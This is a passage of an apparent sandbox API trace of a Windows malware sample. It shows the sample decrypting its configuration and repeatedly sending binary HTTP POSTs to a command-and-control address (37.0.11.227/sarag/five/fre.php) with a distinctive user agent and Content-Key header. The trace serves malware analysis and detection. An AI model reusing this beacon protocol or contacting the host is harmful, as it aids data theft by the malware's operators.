phProv=0x19fca8*=0x6af078) returned 1 [0243.063] GetProcessHeap () returned 0x690000 [0243.063] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0243.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.064] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0243.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.065] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0243.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.066] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0243.066] GetProcessHeap () returned 0x690000 [0243.066] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0243.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.068] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0243.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.069] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0243.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.069] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0243.069] GetProcessHeap () returned 0x690000 [0243.069] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0243.072] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.072] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0243.073] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.073] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0243.073] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.074] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0243.074] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.074] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0243.074] GetProcessHeap () returned 0x690000 [0243.074] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0243.074] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0243.075] GetProcessHeap () returned 0x690000 [0243.075] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0243.075] GetProcessHeap () returned 0x690000 [0243.076] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0243.085] GetProcessHeap () returned 0x690000 [0243.085] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0243.086] GetProcessHeap () returned 0x690000 [0243.086] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0243.087] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.087] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0243.091] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.092] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0243.097] GetProcessHeap () returned 0x690000 [0243.097] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0243.097] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.097] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0243.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.098] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0243.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.099] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0243.099] GetProcessHeap () returned 0x690000 [0243.100] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0243.100] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.101] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0243.101] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.101] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0243.102] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.102] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0243.102] GetProcessHeap () returned 0x690000 [0243.102] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0243.105] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.105] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0243.106] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.106] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0243.106] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.107] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0243.107] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.108] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0243.108] GetProcessHeap () returned 0x690000 [0243.108] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0243.108] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0243.108] GetProcessHeap () returned 0x690000 [0243.108] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab400 [0243.108] socket (af=2, type=1, protocol=6) returned 0x678 [0243.108] connect (s=0x678, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0243.132] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0243.132] GetProcessHeap () returned 0x690000 [0243.132] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0243.132] GetProcessHeap () returned 0x690000 [0243.132] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0243.133] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0243.134] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0243.134] GetProcessHeap () returned 0x690000 [0243.134] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0243.134] GetProcessHeap () returned 0x690000 [0243.134] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0243.135] GetProcessHeap () returned 0x690000 [0243.135] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0243.135] GetProcessHeap () returned 0x690000 [0243.135] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0243.136] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0243.137] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0243.137] GetProcessHeap () returned 0x690000 [0243.137] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0243.137] GetProcessHeap () returned 0x690000 [0243.138] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0243.139] send (s=0x678, buf=0x6ad508*, len=242, flags=0) returned 242 [0243.139] send (s=0x678, buf=0x6aba40*, len=159, flags=0) returned 159 [0243.139] GetProcessHeap () returned 0x690000 [0243.139] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0243.139] recv (in: s=0x678, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0243.215] GetProcessHeap () returned 0x690000 [0243.216] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0243.216] GetProcessHeap () returned 0x690000 [0243.217] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0243.217] GetProcessHeap () returned 0x690000 [0243.217] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0243.217] GetProcessHeap () returned 0x690000 [0243.218] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0243.218] closesocket (s=0x678) returned 0 [0243.219] GetProcessHeap () returned 0x690000 [0243.219] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab400 | out: hHeap=0x690000) returned 1 [0243.219] GetProcessHeap () returned 0x690000 [0243.219] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0243.219] GetProcessHeap () returned 0x690000 [0243.219] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0243.219] GetProcessHeap () returned 0x690000 [0243.220] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0243.220] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1064) returned 0x678 [0243.221] Sleep (dwMilliseconds=0xea60) [0243.223] GetProcessHeap () returned 0x690000 [0243.223] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0243.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.224] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0243.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.228] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0243.234] GetProcessHeap () returned 0x690000 [0243.234] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0243.234] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.234] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0243.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.237] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0243.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.238] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0243.238] GetProcessHeap () returned 0x690000 [0243.239] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0243.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.247] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0243.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.254] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0243.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.255] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0243.255] GetProcessHeap () returned 0x690000 [0243.255] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0243.256] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.256] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0243.263] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.263] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0243.264] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.264] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0243.265] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.265] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0243.265] GetProcessHeap () returned 0x690000 [0243.265] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0243.265] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0243.265] GetProcessHeap () returned 0x690000 [0243.266] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0243.266] GetProcessHeap () returned 0x690000 [0243.266] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0243.266] GetProcessHeap () returned 0x690000 [0243.266] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0243.266] GetProcessHeap () returned 0x690000 [0243.266] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0243.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.267] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0243.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.272] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0243.286] GetProcessHeap () returned 0x690000 [0243.286] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0243.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.287] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0243.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.288] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0243.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.289] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0243.289] GetProcessHeap () returned 0x690000 [0243.289] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0243.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.290] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0243.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.291] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0243.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.294] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0243.294] GetProcessHeap () returned 0x690000 [0243.294] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0243.295] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.295] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0243.296] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.296] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0243.296] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.297] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0243.297] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.298] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0243.298] GetProcessHeap () returned 0x690000 [0243.298] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0243.298] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0243.298] GetProcessHeap () returned 0x690000 [0243.298] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0243.298] socket (af=2, type=1, protocol=6) returned 0x67c [0243.298] connect (s=0x67c, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0243.320] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0243.320] GetProcessHeap () returned 0x690000 [0243.320] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0243.320] GetProcessHeap () returned 0x690000 [0243.320] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0243.321] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0243.321] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0243.321] GetProcessHeap () returned 0x690000 [0243.321] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af500 [0243.321] GetProcessHeap () returned 0x690000 [0243.322] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0243.322] GetProcessHeap () returned 0x690000 [0243.322] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0243.322] GetProcessHeap () returned 0x690000 [0243.322] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0243.324] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0243.328] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0243.328] GetProcessHeap () returned 0x690000 [0243.328] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0243.328] GetProcessHeap () returned 0x690000 [0243.328] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0243.328] send (s=0x67c, buf=0x6ad508*, len=242, flags=0) returned 242 [0243.329] send (s=0x67c, buf=0x6aba40*, len=159, flags=0) returned 159 [0243.329] GetProcessHeap () returned 0x690000 [0243.329] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0243.329] recv (in: s=0x67c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0243.408] GetProcessHeap () returned 0x690000 [0243.409] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0243.409] GetProcessHeap () returned 0x690000 [0243.409] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0243.409] GetProcessHeap () returned 0x690000 [0243.410] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af500 | out: hHeap=0x690000) returned 1 [0243.413] GetProcessHeap () returned 0x690000 [0243.414] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0243.414] closesocket (s=0x67c) returned 0 [0243.414] GetProcessHeap () returned 0x690000 [0243.414] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0243.414] GetProcessHeap () returned 0x690000 [0243.415] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0243.415] GetProcessHeap () returned 0x690000 [0243.415] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0243.415] GetProcessHeap () returned 0x690000 [0243.416] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0243.416] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xf8c) returned 0x67c [0243.418] Sleep (dwMilliseconds=0xea60) [0243.419] GetProcessHeap () returned 0x690000 [0243.419] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0243.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.420] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0243.427] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.427] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0243.433] GetProcessHeap () returned 0x690000 [0243.433] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0243.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.434] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0243.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.435] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0243.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.436] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0243.436] GetProcessHeap () returned 0x690000 [0243.437] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0243.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.439] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0243.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 